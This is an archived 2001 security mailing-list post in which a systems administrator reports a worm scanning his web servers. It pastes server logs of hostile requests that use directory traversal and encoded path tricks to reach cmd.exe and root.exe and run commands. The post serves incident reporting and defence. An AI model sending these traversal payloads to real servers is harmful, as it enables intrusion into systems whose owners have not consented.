massive cmd.exe and root.exe attempts

From: Patrick Beam (pbeamat_private)
Date: Tue Sep 18 2001 - 10:05:55 PDT

Next message: Olivier DEMBOUR: "RE: New worm ??"

Previous message: Sean Kelly: "Website automating download of readme.eml"
Next in thread: Sean Kelly: "Re: massive cmd.exe and root.exe attempts"
Reply: Sean Kelly: "Re: massive cmd.exe and root.exe attempts"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

I am as well being hit by this worm.  Everything seems to be coming from
the same class A 64.*.  I have already seen 1500 plus scans to my web
servers and that number is climbing rather fast.  This seemed to
suddenly pop up with little or no warning?  In the past days I have seen
a few scans here and there but nothing of this magnitude I am wondering
what suddenly changed to cause this type of outbreak?  

2001-09-18 13:26:03 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET
/scripts/root.exe /c+dir 401 -
2001-09-18 13:26:03 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET
/MSADC/root.exe /c+dir 403 -
2001-09-18 13:26:03 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET
/c/winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:26:03 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET
/d/winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:26:03 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:26:03 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:26:03 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:26:03 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET
/msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe
/c+dir 403 -
2001-09-18 13:26:03 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET
/scripts/..Á../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:26:04 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET
/scripts/winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:26:04 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET
/winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:26:04 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET
/winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:26:04 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:26:04 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:26:04 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:26:04 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET
/scripts/..%2f../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:31:36 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET
/scripts/root.exe /c+dir 401 -
2001-09-18 13:31:36 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET
/MSADC/root.exe /c+dir 403 -
2001-09-18 13:31:36 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET
/c/winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:31:36 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET
/d/winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:31:36 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:31:37 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:31:37 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:31:37 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET
/msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe
/c+dir 403 -
2001-09-18 13:31:37 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET
/scripts/..Á../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:31:37 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET
/scripts/winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:31:38 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET
/winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:31:38 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET
/winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:31:38 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:31:38 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:31:40 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:31:40 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET
/scripts/..%2f../winnt/system32/cmd.exe /c+dir 401 –

Patrick Beam
Senior Systems Administrator
Agea Corp.


----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

Next message: Olivier DEMBOUR: "RE: New worm ??"
Previous message: Sean Kelly: "Website automating download of readme.eml"
Next in thread: Sean Kelly: "Re: massive cmd.exe and root.exe attempts"
Reply: Sean Kelly: "Re: massive cmd.exe and root.exe attempts"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue Sep 18 2001 - 11:19:15 PDT